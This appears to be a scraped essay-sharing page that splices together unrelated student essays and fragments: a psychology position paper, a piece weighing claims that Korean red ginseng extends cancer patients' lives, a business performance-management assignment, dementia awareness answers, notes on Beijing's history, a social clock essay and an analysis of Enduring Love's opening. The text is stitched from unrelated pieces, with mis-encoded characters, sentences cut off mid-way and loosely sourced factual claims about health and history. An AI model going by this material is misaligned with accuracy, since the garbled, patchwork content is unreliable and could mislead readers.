Tuesday, December 24, 2019

Communicating The Value Of Psychology - 1863 Words

Communicating the Value of Psychology Chelsea Xu Perth Modern School Department of Psychology Position Paper March 20, 2015 Table of Contents 2 Position Statement/Introduction 3 Developmental Psychology 4 Social Psychology Cross Cultural Psychology Conclusion References Position Statement ‘A wonderful fact to reflect upon, that every human creature is constituted to be that profound secret and mystery to every other’ – Charles Dickens, A Tale of Two Cities Psychology is the study of mind, behaviour, performance and the mental operations of people. It can be applied to various aspects of the human life. Everything a person does it related to psychology because it studies who and what someone is and why they act and think the way they do and how they can improve themselves. It is also an important factor in helping to diagnose many mental diseases. Several doctors have been able to use psychological studies to develop medicine to aid in illnesses. This topic allows people to understand how the body and mind works. It can help with decision making and avoid stressful situations. It can help with managing times, set and achieve goals and become more effective with the way that one lives. Psychology is important because, for some people, learning can be viewed as their purpose in life. We can gain a better understanding of the causes of our own behaviour through the study of psychology. It also allows us to learnShow MoreRelatedGlobalization and Organizational Behavior1049 Words   |  5 Pagesfor a product or service, perpetuating continuous operations and communicating around the clock and globe, capitalism is replacing governmental control and organizations are no longer constrained by borders, and corporations are becoming more heterogeneous and adapting to people who are from different nationalities and cultures. To be successful in a global economy, professionals should have a thorough knowledge of sociology, psychology, communication, and management. The global economy has enabledRead MoreCommunication in Health and Social Care Essay1670 Words   |  7 Pagesinteraction through exposure to messages,It emphasizes measuring,explaining and predicting communication effects on knowledge,perceptions,beliefs,attitudes and public opinion,It is strongly influenced by scientific methods from the fields of psychology and social psychology. 3.Message production is the study of the large-scale organization through social institutions and system,example; mass media,political organisation,government and advocacy groups. ,Their history, regulations,policy making impact,ItRead MoreWhy Culture Matters Within International Business1076 Words   |  5 Pagesculture and how this can improve the business once it is expanded abroad. According to Cavusgil, knight, Riesenberger(2014), â€Å"Culture is the learned, shared and lasting orientation patterns in a society. People demonstrate their culture through values, ideas, attitudes, behaviors, and symbolsâ€Å"(p.82). The culture that a person may live in or grow up in can make us who we are today. Culture affects every aspect of our daily lives, whether it be from the decisions that are made and carriedRead MoreMotivation : Extrinsic And Intrinsic Factors1476 Words   |  6 PagesGerhart and Fang (2015) add that extrinsic motivation is perceived to be inferior form of motivation, and current research has paid little attention to generational shifts in extrinsic and intrinsic values. Twenge, Campbell, Hoffman and Lance (2010) argue that there is a generational shift towards work values and observed that Generation Y is less intrinsically motivated. Thus, each generation is motivated differently, and the implications for future workforces lies in the considerations of such generationalRead MoreMarketing/Marketing Strategy750 Words   |  3 Pageswhich is perfectly correct as marketing practice tended to be seen as a creative industry in the past, which included advertising, distribution and selling. However, because the academic study of marketing makes extensive use of social sciences, psychology, sociology, mathematics, economics, anthropology and neurosc ience, the profession is now widely recognized as a science. It is also related to many of the creative arts as marketing involves creating the right product for the right customer andRead MoreEssay about Marketing and Psychology862 Words   |  4 PagesMarketing and Psychology Mustafa Bilal University of Phoenix PSY/322 October 7, 2013 Chawn Williams Consumer psychology is a sub-branch of social psychology that falls under the umbrella of psychology. A consumer is a person or group that uses a service of product. Psychology is the study of the mind. These two words, when put together is the study of the human mind concerning â€Å"why† and â€Å"how† it decides why, what, where, and when to consume a product or service. Consumer psychology seeksRead MoreConsummer Psychology and Marketing Communication971 Words   |  4 PagesConsumer Psychology and Marketing Communication Message Consumer Psychology and Marketing Communication: A view to Concepts and Drives PSY322 February 27, 2013 Abstract This essay will discuss the definition of consumer psychology, and will describe the psychological concepts and their importance in developing a successful marketing communication message. It will further explain the relationship between consumer psychology and marketing communications. Consumer Psychology and MarketingRead MoreCommunicating Online Essay1065 Words   |  5 PagesIntroduction. Communicating in today’s society has become a lot easier with these social networking sites allowing us to communicate with people with a simple click of the mouse. This essay is going to prove that social networking sites are evolving and that communicating online is making it easier for people to communicate, easier for people to invite others to social events and allow people to have romantic relations online. Social networking makes it easier to communicate: Facebook is popularRead MoreMy Professional Journey As A Counselor985 Words   |  4 Pagesserving, and positive values from rich experiences have made me a qualified candidate for the Clinical Mental Health program in Eastern Illinois University. My interest in psychology started before I began pursuing my major in Dietetics. When I was younger, my cousin who studied Psychology once mentioned to me about some fun facts that he learned in school such as different stages of sleeping cycles, Rapid Eye Movement (REM) and dreams which sparked my interest in psychology. In addition, I wasRead MorePsychology Is The Science Of Understanding People And Animals1020 Words   |  5 PagesPsychology is the study of thoughts and behaviors. Psychology is the science of understanding people and animals. When you try to figure out why someone does something that is psychology. A person that studies psychology is a psychologist. Psychology and the study of psychology is not new. There are prehistoric record that show effort of trying to heal people who were mentally ill or disturbed. Psychology is a science because it has some of the same values they use in research. Psychology is social

Sunday, December 15, 2019

Can Korean Red Ginseng Increase the Life Span of Cancer Patients Free Essays

According to the newspaper article, it claims that Korean red ginseng is capable of increasing the life spans of cancer patients. However, it seems that no concrete evidence is present as yet to substantiate this claim since â€Å"nobody knows the results†. The article mentioned that Korean red ginseng has played a vital role in extending French politician, Francois Mitterrand’s life from three months to more than half a year. We will write a custom essay sample on Can Korean Red Ginseng Increase the Life Span of Cancer Patients? or any similar topic only for you Order Now Professor Kim Si-kwan at Konkuk University further supports this statement as he mentioned, â€Å"red Korean ginseng reduces the amount of reactive oxygen species (ROS) in the body†. Similarly, Professor Park Jeong-hill at Seoul National University also supported the statement as he said, â€Å"it is crucial to deter ROS to prevent or deal with cancer†. According to my online research, ROS are chemically reactive molecules that contain oxygen and they are able to cause harm to cell structures. Particularly, oxidative DNA damage can arise from mitochondria mutation and therefore, leading to cancer (Frei, 1997). Besides that, Korean Ginseng Corporation has stated that Korean red ginseng contains anti-carcinogenic that aids in limiting or slowing down the spread of cancer cell growth. Hence, I feel that it is a sound claim that Korean red ginseng is able to deter cancer cell growth since Korean Ginseng Corporation has stated its stand to support the article’s claim in their company website. Korean Ginseng Corporation has over a hundred year of legacy worldwide and its ginseng is available in the international markets as well, hence it is very likely that the statement from its company website is trustworthy and accurate. Therefore, this makes it a reliable piece of evidence to a certain extent and I can trust its contents. Moreover, Korean Ginseng Corporation has also carried out several experiments to substantiate the fact that Korean red ginseng is able to bring about longer life spans. For instance, a control group of men and women were made to consume Korean red ginseng for a given period of time and compared to those who did not consume it. Results showed that those who consumed the Korean red ginseng lived a longer life than those who did not (Please refer to Appendix 1). As a result, I feel that this piece of evidence is sufficient to support the article’s claim and I can accept its stand. Adding on, the consumption of Korean red ginseng is able to help decrease incidence of cancer according to Korean Ginseng Corporation (Please refer to Appendix 2). Thus, I trust the article’s claim to an extent. However, I feel that the evidence from the article is unreliable to a certain extent. From the article, it is said that Mitterrand’s life span had increased to more than twice because he consumed Korean red ginseng. A possible reasoning that he lived longer than expected could be due to the inaccurate prediction from his doctor, rather than the effects of Korean red ginseng alone. From my online research, it is common that doctors are â€Å"poor at predicting life span, even when they’re dealing with the terminally ill† patients (Schumann, 2010). Thus, I feel that it is not accurate evidence to support the article’s claim and I am unable to accept it. Furthermore, the article states â€Å"one of the most bought items by visiting Chinese tourists to Korea is red ginseng†. This statement is vague and I feel that it does not imply that the consumers bought the Korean red ginseng out of pure belief that it can prevent cancer, or rather to increase their life span. There is a possibility that the consumers bought the Korean red ginseng because of the effects of â€Å"word of mouth†, which means that they buy the ginseng simply because everybody else had bought it. It is similar to a chain effect. As such, I feel that this evidence from the article is insufficient and I am unable to accept that it can support the article’s claim. Moreover, the extension of life span of cancer patients can be attributed to many other external factors rather than just the consumption of Korean red ginseng alone. For instance, studies have shown that by maintaining an optimistic attitude can help lengthen life span too (Wells, 2012). A Yale University researchers statement further supports this statement that: Positive self-perceptions can prolong life expectancy (Lovette, 2012). Hence, this shows that the claim is unreliable to a certain extent since it failed to recognize other factors that contribute to the increase of life span. In conclusion, I agree with the claim made by the article after weighing both sides of it. It is no doubt that Korean red ginseng is able to bring about good health if consumed long term. However, I feel that the use of Korean red ginseng to overcome cancer cannot be regarded as a single remedy on its own. It must be coupled with other external factors such as healthy lifestyle, optimistic environment and attitude in order to maximize the positive effects. According to Korean Ginseng Corporation, long-term consumption of it can help fight insomnia, anti-ageing, increase concentration, stamina, improve memory function and many more. Frei. B. (1997). Reactive Oxygen Species and Antioxidant Vitamins. Taken from http://lpi. oregonstate. edu/f-w97/reactive. html Korean Ginseng Corporation. Taken from http://www. kgcus. com/Studies. html Lovett. S. (2012). 10 Practical steps to a more optimistic attitude- in just 30 days Taken from http://australianriverrestorationcentre. com. au/2012/05/ Schumann. J. H. (2010). The Worst Fortune Tellers. Why doctors are so bad at predicting how long their patients will live. Taken from http://www. slate. com/articles/health_and_science/medical_examiner/2010/08/the_worst_fortune_tellers. html Wells. J. (2012). Optimistic People Live Longer Taken from http://www. familyhealthguide. co. uk/10-tips-for-a-longer-happier-life. html How to cite Can Korean Red Ginseng Increase the Life Span of Cancer Patients?, Essay examples

Saturday, December 7, 2019

Most Essential Business Model Components â€Myassignmenthelp.com

Question: Discuss About The Most Essential Business Model Components? Answer: Introducation Ordering and delivering of food is not a new business idea. However, with the concept of innovation and advancement, the idea of food business has evolved with changing times. There have been various options for me to initiate a start-up regarding the grocery delivery, restaurant table booking, midnight food delivery, etc. I recognized that with the hectic schedule of people with high-stress factor and juggling of work at both work place and home, there is always a scarcity of time for cooking and operating own food for work (Ebner, Buhnen Urbach, 2014). With the upheaval of a hectic lifestyle, there is a direct effect on the health of the people in a negative way. This inspired me to initiate a business idea regarding online delivery of meal boxes which are completely oriented to healthy dietary patterns. The meal boxes that my business would provide would have food dishes that are very customized by considering health and diet considerations. People can be very conveniently ordered for the dishes and meals according to their likeness and diet concerns as we do not use any excessive amount of oil, flours and other food items that pose adverse effects to health. People having a hectic work schedule and at the same time desire to have a completely structured diet through well prepared, light meals can very easily book order their meal boxes which will be delivered to them at their desired location within an hour (Ferretti, et al., 2015). They would also be able to have their meals customized which will allow them the liberty to have a mixed combination of food every day. My business of online food delivery of meal boxes also offers the facility for consumers to book meal boxes for the entire month where they can choose their meals every day at once (Lai, et al., 2016). The business model that we follow is much in resonance with the objective of the business to provide healthy meals to people having a hectic schedule. Our business understands that having same boring meals may tend to bore any employee. In order to bring back the deliciousness into the lives of the employees along with removing the hassle of preparing food, our business model completely matches the mission of the business. The consumers will need to create a profile on our official website and get registered with the service platform. The users will be receiving a message regarding the available options for meals every day at a particular time so that they can very well be aware and notified regarding the meals without making any effort (Winfield, 2015). The interested users and consumers can very conveniently place the order and make the required payment online. We would then forward the order to our kitchen to prepare the meals box well accordance with the order of the consumer keeping his or her dietary requirements and preferences in consideration (Lai, et al., 2016). After the processing of the order has taken place, the meal platform will make the collection of the order and implement the delivery of the ordered meal box to the respective location (work place or home, etc) at the specified time. References Ebner, K., Buhnen, T., Urbach, N. (2014, January). Think big with Big Data: Identifying suitable Big Data strategies in corporate environments. InSystem Sciences (HICSS), 2014 47th Hawaii International Conference on(pp. 3748-3757). IEEE. Ferretti, A., Colombo, D., Fumagalli, A., Novali, F., Rucci, A. (2015). InSAR data for accounting land subsidence: time to think big.Proceedings of the International Association of Hydrological Sciences,372, 331. Lai, J., Leow, W. K., Sim, T., Sharma, V. (2016, March). Think big, solve small: Scaling up robust PCA with coupled dictionaries. InApplications of Computer Vision (WACV), 2016 IEEE Winter Conference on(pp. 1-8). IEEE. Winfield, L. (2015). Student life-Catalyst for ideas: A prize for third-year Plymouth University students encourages them to think big, says lecturer Louise Winfield. Nursing Standard,29(40), 66-66.

Saturday, November 30, 2019

The Biblicality of the social clock Essay Example

The Biblicality of the social clock Essay The belief that there are descriptive and prescriptive age norms concerning adults during their developmental shift involves the concept of the social clock. The social clock hinges on its description of society’s expectations where time to get married and have children at the same time attaining more of life’s burdens. For example, the traditional or what has been considered as the perception of women who have not yet entered into matrimony as individuals who are negatively appraised during their middle adulthood stage in contrast to the young adults. Social clock has something to do with an expectation that a person must somehow behave or conduct him/herself according to established developmental milestones or else, risk the consequences that may happen because the individual has allowed it to slip through ( Altenbernd, 2004). Discussion The concept is not unknown to anyone today, this despite the fact that many among Americans have grown to know in informal set-ups that the social clock exists and must be followed. We will write a custom essay sample on The Biblicality of the social clock specifically for you for only $16.38 $13.9/page Order now We will write a custom essay sample on The Biblicality of the social clock specifically for you FOR ONLY $16.38 $13.9/page Hire Writer We will write a custom essay sample on The Biblicality of the social clock specifically for you FOR ONLY $16.38 $13.9/page Hire Writer In the Bible, there are direct references when the Scriptures contradicted this traditional system. Although the Bible also showed how patriarchs like Abraham and his wife Sarah, had observed (in one instance, in panic) that both are past their childbearing stage and laughed (especially Sarah) when the angel did say that they will have their son born soon. In Genesis 17: 11, it says that â€Å"Now Abraham and Sarah were old, well advanced in age; and Sarah had passed the age of childbearing (NKJV).† My opinion and belief is that when a person has the same God as that of Abraham, Isaac and Jacob, there is no confinement to the so-called social clocks. In the case of Sarah and Abraham, they were indeed past the age to bear children, and the book of Genesis showed that God is who He is, and precisely He can do with anything; He made Sarah deliver a baby boy just as He told them.

Tuesday, November 26, 2019

The eNotes Blog Sylvia Fitz in Time forGatsby

Sylvia Fitz in Time forGatsby Anyone who has ever marked up a page of The Great Gatsby, youre in good company. Dangerous Minds this week posted a page from Sylvia Plaths own copy, complete with annotations. But of course, as theyre Sylvia Plaths, we inevitably find ourselves reading into them The excerpt comes from the first chapter of the novel. In it, Daisy tells Nick and company her reaction to the birth of her daughter. Heres exactly what Plath found so interesting on the page: She told me it was a girl, and so I turned my head away and wept. ‘All right,’ I said, ‘I’m glad it’s a girl. And I hope she’ll be a fool that’s the best thing a girl can be in the world, a beautiful little fool.’ â€Å"You see I think everything’s terrible anyhow,† she went on in a convinced way. â€Å"Everybody thinks so -nthe most advanced people. And I  know. I’ve been everywhere and seen everything and done everything.† Her eyes flashed around her in a defiant way, rather like Tom’s, and she laughed with thrilling scorn. â€Å"Sophisticated God, I’m sophisticated!† In the margin beside the highlighted second paragraph, Plath wrote the comment lennui. So  whereas Nick felt the basic insincerity of what she had said, Plath herself felt Daisy to be suffering from listlessness. Was she sympathetic to Daisys cynical views of the world? Seemingly, the passage resonated enough with Plath for her to mark it up like that. But should we take meaning from it, or simply chalk it up to active reading? Any thoughts eNoters?

Friday, November 22, 2019

Business Measurement Model Strategy and Innovation

According to Moynihan & Pandley (2010), performance management is the process of aligning systems, employees and organizational resources to the organization’s strategic goals. It includes activities ensuring consistent achievement of targets in an efficient and effective manner.   Operations management, on the other hand, involves controlling the whole production process so as to control efficiency in the organization regarding the provision of goods and services, (Subramanian & Ramanathan, 2012). Performance management in the context of operations management, therefore, focuses on the performance of employees, departments, entire organization and process of creating goods and services within the firm. It is used to refer to tools, activities, processes and programs that are applied by the pany in the management of teams and departmental or individual performance. Cost leadership: A pany may have a target to reduce the costs of its product so as to make them more affordable to the customers, (Teece, 2010). This is cost leadership. It is a strategic objective that can be achieved through offering price cuts and customized products to enable low and middle-i e families to afford them. Differentiation objective: This is an objective that can be used by firms to make their goods and services unique, (Rathaermel, 2015). A pany may make exclusive brands which are different from those of its rivals. This may make the firm more petitive as pared to other enterprises as it will be able to develop a market niche Focus: A pany with this objective can concentrate on customer satisfaction through provision of high-quality products at high prices, or cost reduction by adopting cost leadership, (Teece, 2010). A firm which utilizes cost leadership may have an objective of focusing on low and middle-i e families, so as to gain a petitive edge. Operational excellence goal: A pany may develop an objective of automating the production process so as to improve efficiency in its activities. This may enable it to develop cost leadership, (Guest, 2011). When the organization can provide goods at affordable prices, then it may achieve customer loyalty for its products. Product leadership: This is an objective that enables a firm to provide superior products to the market. It can be a plished through automation of the production process and utilizing the services of experienced personnel, (Gurman, 2011). This objective can also be used to achieve product differentiation. Importance of performance management to ABC garments Ltd concerning; Regular feedback enhances efficient munication in the organization. Performance management assists in determining the weaknesses and strengths of the enterprise, (Guest, 2011). This could be monitored regarding the machines available and the type of workforce in the firm. It also allows for a forum to exchange expertise and views in the business, (Guest, 2011).   Primarily, it gives the management of ABC a better understanding of the firm- whether the machines should be serviced, whether to employ more skilled staff or to adopt a particular technology so as to improve the operating system. When the subordinates and the managers have an explicit knowledge of the particular operations they should carry out, any plexities in the workplace can quickly be eliminated. Performance management may, therefore, enable ABC to hold each employee accountable for their actions. This will empower and clarify the responsibilities of each worker in the operating system, (Kamruzzaman, 2011). Also, performance management plans involve clear, precise, understandable and practical improvement in productivity and operations. Through conducting this activity, the management of ABC Ltd can identify key areas of weaknesses so as to adjust in them. Some operations may be cash traps to the firm, (Pertusa-Ortega, Molina-Azorin &Claver-Cortes, 2010). Such transactions should be retrenched so as to reduce unprofitable expenditures. The pany is also able to evaluate the key capabilities and weaknesses through evaluating its employees’ performance and the available machines, (Ullah, 2015). Cost reduction can also be achieved through risk management. The manager can identify possible risks that the business is exposed to and adjust to them in time before incurring losses. Performance management will enable the management of ABC to identify the potential of every employee. This makes the management to stage the employee in appropriate positions that they can work inappropriately. It will encourage efficiency in the organization by reducing wastages in terms of time and resources, (Titacchi, Tonelli & Cagnazzo, 2010). Minimization of costs of operation will also be achieved, making the firm to be more profitable. As explained by Gurman (2011), conducting performance appraisal enables a pany to utilize the physical resources available in the environment optimally. These may include raw materials, technology, and gaps in the market.   Through conducting performance management, ABC Ltd can identify the training needs of its employees and train them appropriately so that they can obtain the relevant skills to use the recent technology in the market to promote its products. These may include social media marketing and e merce.   Through performance measurement, the management is in a position to identify the effectiveness of devices and determine maintenance and replacement times. The management of ABC is also able to monitor the skills of its employees so as to ensure that the machines are being handled efficiently. Performance management is also an essential basis for determining training needs in the enterprise, (Guest, 2011).Whenever the ABC detects mishandling of machines, then it may be able to train the employees on the proper ways of handling the tools so as to increase productivity. Gruman, J. A., & Saks, A. M. (2011). Performance Management and Employee Engagement. Human Resource Management Review, 21(2), 123-136.  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚   Guest, D. E. (2011). Human Resource Management and Performance: Still Searching for Some Answers. Human Resource Management Journal, 21(1), 3-13.  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚   Kamruzzaman, M. (2011). ABC Knit Dyeing & Finishing Mills Ltd (Falcon Group) (Doctoral Dissertation, Daffodil International University).  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚   Moynihan, D. P., & Pandey, S. K. (2010). The Big Question for Performance Management: Why Do Managers Use Performance Information? Journal of Public Administration Research & Theory, 20(4), 849-866. Pertusa-Ortega, E. M., Molina-Azorà ­n, J. F., & Claver-Cortà ©s, E. (2010). petitive Strategy, Structure and Firm Performance: A parison of the Resource-Based View and the Contingency Approach. Management Decision, 48(8), 1282-1303.  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚   Rothaermel, F. T. (2015). Strategic Management. New York, NY: Mcgraw-Hill.  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚   Subramanian, N., & Ramanathan, R. (2012). A Review of Applications of Analytic HierarchyProcess in Operations Management. International Journal of Production Economics, 138(2), 215-241. Taticchi, P., Tonelli, F., & Cagnazzo, L. (2010). Performance Measurement and Management: A Literature Review and a Research Agenda. Measuring Business Excellence, 14(1), 4-18. Teece, D. J. (2010). Business Models, Business Strategy and Innovation. Long Range Planning, 43(2), 172-194.  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚  Ã‚   Ullah, A. (2015).Garment Industry in Bangladesh: An Era of Globalization and Neo- Liberalization. Middle-East Journal of Business.

Wednesday, November 20, 2019

Compare and contrast the transport planning models for passenger and Research Paper

Compare and contrast the transport planning models for passenger and freight transport - Research Paper Example Through such  information estimates are made about the effect of new  developments on  the amount of required  parking space and local  traffic volumes (Litman, 2012). Economic models focus on identifying  and comparing  the benefits  of certain  transportation improvements, like  the advantage  of expanding  a roadway or  improvement in public transit service.  They endeavor to  compare multifarious  classifications  of benefits and costs. They concentrate on  a comparatively  limited set of advantages.  For instance  they  often overlook  vehicle ownership cost savings and parking considerations that arise  due to  switching of travelers  from automobile travel to other  modes (TRB-Transportation Research Board). These models aim at anticipating the impact of  transportation improvements on land use patterns like the kind of  location and  development that  will evolve as a consequence of  improvement of  highway or transit service.  These are deemed to be  the best tools for analyzing  transportation programs and  policies (Litman, 2012).   The purpose of these  models is to  predict the effect of certain  vehicle  transport policies and projects on  fuel consumption  and pollution emissions. However  it is observed  that  traditional models mostly underscore  emission reductions and expansion of roadways while they  undermine  TDM strategies (Slack, 2013). Transport planning models for freight transport  focus more  on quantitative factors like  operating costs,  travel speed  and crash rates etc while planning models for passenger transport give more consideration to  qualitative factors like  travel convenience,  security and comfort of passengers (Slack,

Tuesday, November 19, 2019

History and Analysis of city Assignment Example | Topics and Well Written Essays - 2500 words

History and Analysis of city - Assignment Example Located at north latitude of 39 degrees 56’ and east longtitude of 116 degrees 20’, Beijing grandly reposing along the north most part of the north China plain; along with the northwest is the Shanxi province and inner Mongolian plain, and from the east is the Bohai sea. Among the neighborhood provinces are the Hebei province and Tianjin to the southeast. Beijing as being considered as one of the three mega cities of China under the direct jurisdiction of the central government is divided into 10 districts and 8 respective counties. The people of Beijing are enjoying the moderate continental climate. 600 to 700 millimeters is the average rainfall Beijing receives yearly and much of it falls in late June, July, and August. Spring is dry and dusty and the best season being considered in Beijing, as well as in the whole of China is the autumn. Beijing serves as the political and cultural center of the modern China. It was the considered as the capital of many dynasties dur ing the past, ancient times. Everything in this place picturesque the aura of the past history, battles, origins and the sensations present in this place will lead encourage anyone to feel the deep respect for the city that holds stories dated back to its origin. Taihang Mountains Beijing claimed to be a gulf by the historians and geologist two to three million years ago. The geographical distribution of Beijing is very significant to be called â€Å"Beijing Gulf†. Beijing is enclosed by Taihang Mountains located at the west and Yanshan to the north, to the east is the Bohai Bay and in front of the Hebei plain to the south. According to geologist and historians, the melting of ice and snow during spring carried enormous amount of mud from the mountains to the gulf. This was transformed to be alluvial plain and is now known to be Beijing. Mountains that surround Beijing serves as the protection cover from the northern strong winds. From the east part blew the wet air, huge pla in stretched far to the southland and wide lengthy rivers and streams are some of the features that this place is made suitable environment for human to live and settle down. Inhabitants of this place are also blessed with temperate climate and plentiful rainfall that suits to agricultural activities. History of Beijing Peking Man Anthropologist’s claim that evidences shows manifestations that more than half a million years ago, in the southwest suburbs lived a Peking man. Climate condition during that time was warmer and compared to the present climate of Beijing. Relics of the Peking man was found as well as the stone tools, how the fire was used up to the tools being used way back 18000 ago. It is considered as the earliest cultural relics China have recorded in the history. The true significance of the city’s origin, tracing back 2,000 years ago, started in the period of the Western Zou Dynasty dated 11th century BC to 771 BC. The feudal lords during this time were given by the emperor plots of land in which one of the plot given was called â€Å"Ji City†. This is considered as the first city in Beijing history. During the Eastern Zhou Period dated 476 BC to 221 BC, the Ji kingdom was abolished and replace by â€Å"Yan Kingdom† but JI remains as the capital during that time. When china was unified by Emperor Qin Shi Huang, Beijing has been considered as a strategic place in China’s northern part. Beijing was called â€Å"

Saturday, November 16, 2019

Dementia Awarness Essay Example for Free

Dementia Awarness Essay 1. The word dementia describes a set of symptoms that may include memory loss and difficulties with thinking, problem-solving or language. Dementia is caused when the brain is damaged by diseases, such as Alzheimers disease or a series of strokes. The term ‘dementia’ is often misunderstood and some people use the terms ‘senile’, ‘dementia’ and ‘Alzheimer’s’ interchangeably, thinking that they are one and the same thing. 2. Key functions of the brain that are affected by dementia. The brain, along with the spinal cord, makes up the central nervous system, and it is this that controls all of our body’s functions. The brain is made up of cells an within the brain there are billions of nerve cells that are known as neurons. These neurons communicate with each other and with other parts of the body by sending messages (impulses) via a system of nerve pathways. Chemical and electrical signals are necessary in controlling bodily functions ie language, decision-making, memory, personality, behavior, sensing and interpreting our environment, and controlling muscle movements. If the neurons and synapses of the brain become damaged by dementia they may have difficulty or be unable to carry the messages that tell the sections of the brain what to do. Depending on the area of the brain affected, this can result in changes to the way the individual thinks, or may result in physical impairments, personality and behavioral changes or the inability to perform certain functions. 3. If a person shows signs of cognitive impairment, it should not automatically be assumed that they have dementia. There are other conditions that have similar symptoms to those of dementia. Depressions is a common condition which can be triggered by lifes events and can be caused by chemical imbalances in the brain. A person who is suffereing from depression can show similarsymptoms to a person who has dementia. Depession can effect concentration, motivation and ability to manage everyday tasks. Delirium can also be mistaken as dementia, Delirium can deveopl quickly and is isually reversable. People have hallucinations, delusions, probles thinking or serve confusion. Some of the causes include dehydration, pain, low blood sugar level or a chest/urinary infection. 4. Medical model relates to clinical approach ie. how the changes occur within the brain, managing the condition with medication, etc Dementia as a clinical syndrome is characterized by global cognitive impairment, which represents a decline from previous level of functioning, and is associated with impairment in functional abilities and, in many cases, behavioral and psychiatric disturbances. 5. Social model is more about the person, how it affects individuals. The social model of care seeks to understand the emotions and behaviors of the person with dementia by placing him or her within the context of his or her social circumstances and biography. By learning about each person with dementia as an individual, with his or her own history and background, care and support can be designed to be more appropriate to individual needs. 6. People who have dementia should be view as a disability because they are not aware of requirements for living. They can forget to do the essential things that are vital. Taking medicines, hygiene and even eating are often forgotten. They can get lost or hurt and not understand what is necessary to correct a situation. Turning on the stove or water and forgetting to turn it off, locking doors, crossing streets etc, this can be dangerous even deadly. In the same way you would not think as an infant incapable of self care a person with dementia can not be either. Considering the facts that they cannot act in the manner of a responsible adult makes them disabled. 7. Dementia is not a single disease in itself, but a general term to describe symptoms such as impairments to memory, communication and thinking. Vascular dementia Injury HIV infection Reversible factors Memory loss A person with dementia may show any of the following problems, mostly due to memory loss some of which they may notice (or become frustrated with) themselves, while others may only be picked up by carers or healthcare workers as a cause for concern. 8. Mixed dementia refers to a diagnosis of two or three types occurring together. A person may show both Alzheimers disease and vascular dementia at the same time. Or the combination could be Lewy bodies and Alzheimers. There can also be a combination of all three types. Recent memory loss a sign of this might be asking the same question repeatedly, forgetting about already asking it. Difficulty completing familiar tasks for example, making a drink or cooking a meal, but forgetting and leaving it. Problems communicating difficulty with language by forgetting simple words or using the wrong ones. Disorientation with time and place, getting lost on or in a familiar street/place close to home. Poor judgment example A well person might get distracted and forget to watch a child for a little while. People with dementia, however, might forget all about the child and just leave the house for the day. Problems with abstract thinking for example, dealing with money. Misplacing things including putting them in the wrong places and forgetting about doing this. Mood changes unlike those we all have, swinging quickly through a set of moods. Personality changes becoming irritable, suspicious or fearful, for example. Loss of initiative showing less interest in starting something or going somewhere. 9. Some of the risk factors associated with dementia can be managed through lifestyle changes or appropriate medical treatments. Dementia can be due to age that means as we get older, we are more likely to develop dementia. Risk factors for cardiovascular disease (like heart disease and stroke) are also risk factors for all dementia. Some studies suggest that enjoying an active life, with lots of interests and hobbies might be beneficial. Other researchers have found that spending more time in education is associated with a lower risk. The genes we inherit from our parents only have a small effect on our risk of dementia. In very rare cases, a faulty gene can be passed down in a family that causes the disease in anyone who inherits it. Some forms of Alzheimer’s and dementia can be caused by faulty genes. 10. Alzheimers is the most prevalent. 5. 4 million possibly more have Alzheimers. 5. 2 million are over the age of 65 years old. 200,000 people under the age of 65 have Alzheimers and are considered to have early onset Alzheimers. Vascular Dementia is the second most prevalent. After that things convoluted a bit but Dementia with lewy bodies is probably third. 11. People with dementia may not necessarily always be forgetful, for example an individual with Front-temporal dementia may be less forgetful than a person suffering from Alzheimer disease. There memory may remain intact but their personality and behavior could be noticeably changed. Dementia with Lewy bodies is caused by neurodegeneration linked to abnormal structures in the brain. Here, the brain changes involve a protein called alpha-synuclei this interrupts the normal functioning and affect the persons memory. 12. Dementia can have a big impact on a person’s behaviour. People with dementia face widespread discrimination for a number of reasons. There remains significant misunderstanding about and stigma attached to dementia that manifests itself in widespread discriminatory attitudes. Because most people with dementia are over the age of 65, they can also face issues of age discrimination. People with dementia are also more at risk of discrimination and infringements of their human rights because they may not have the capacity to challenge abuses of their human rights or to report what has occurred. This means that many people with dementia and their carers face a poorer quality of life than the general population. People with dementia and those who care for them should be treated with dignity and respect, and should have access to high quality care, that is based on an assessment of personal needs and preferences.

Thursday, November 14, 2019

The Opening Chapter of Enduring Love by Ian McEwan Essay -- Enduring L

The Opening Chapter of Enduring Love by Ian McEwan A dictionary defines the word addictive as being: wholly devoted to something, a slave to another and in a state of wanting more. Ian McEwan claimed that he wanted to write an opening chapter that had the same effect as a highly addictive drug. In my opinion he has achieved in doing this. At the end of chapter one the reader is left needing more information about the characters introduced and what tragedy actually occurred. McEwan took the definition, addictive, and wrote the opening chapter, never forgetting what his objective was. The opening chapter has to be effective in order to keep the reader interested and to keep them reading. The style of the writer and novel also need to be established and tailored to suit the tastes of anyone that decides to read this novel. McEwan uses many factors that all contribute towards the effectiveness of the opening chapter. A lot of suspense and tension is used right from the start of the novel, in the first line, "The beginning is simple to mark," which makes you question, the beginning of what exactly? This is a short sentence that is used which draws you in and leaves you wanting to know more. McEwan also creates a lot of tension, "partly protected from a strong, gusty wind," which describes the wind as being an unpredictable, natural force which together conveys a sense of urgency. The narrator also starts to withhold vital information from the reader to create anxiety from within. "The encounter that would unhinge us was minutes away," the narrator is building up the tension that leads to this huge disaster, but doesn’t just say what is install for him and the other characters. He also hints that the disaster is life changing, "This was the last time that I understood anything clearly at all." The narrator then goes on to describe the atmosphere and events just before the disaster reached them, "I heard what was coming two seconds before it reached us." Which is an innuendo, which McEwan uses a lot throughout this first chapter. The narrator then goes on to describe the wind that day using verbs to describe the strength of it, "transversing" and "hurtling," but before the narrator goes any further he says "Let me freeze the frame," which is media terminology, which too is used quite a lot through this opening chapter. McEwan uses this techniq... ...t it is ruthless and is used to increase the sense of danger, "Met Office figures. . . . . . it was said of 70 miles per hour." The wind threatens the characters, leaving the reader knowing that disaster is just around the corner. The idea of a catastrophe is always present throughout the opening chapter. It is used to create excitement in the reader and to fuel the craving of needing more information, "At the inquest" at this point, the reader is left to deal with the fact that, obviously someone died, but it is not yet revealed who - the boy in the basket or Logan. Also, the fact that what happened is life changing, "It was time when other outcomes were still 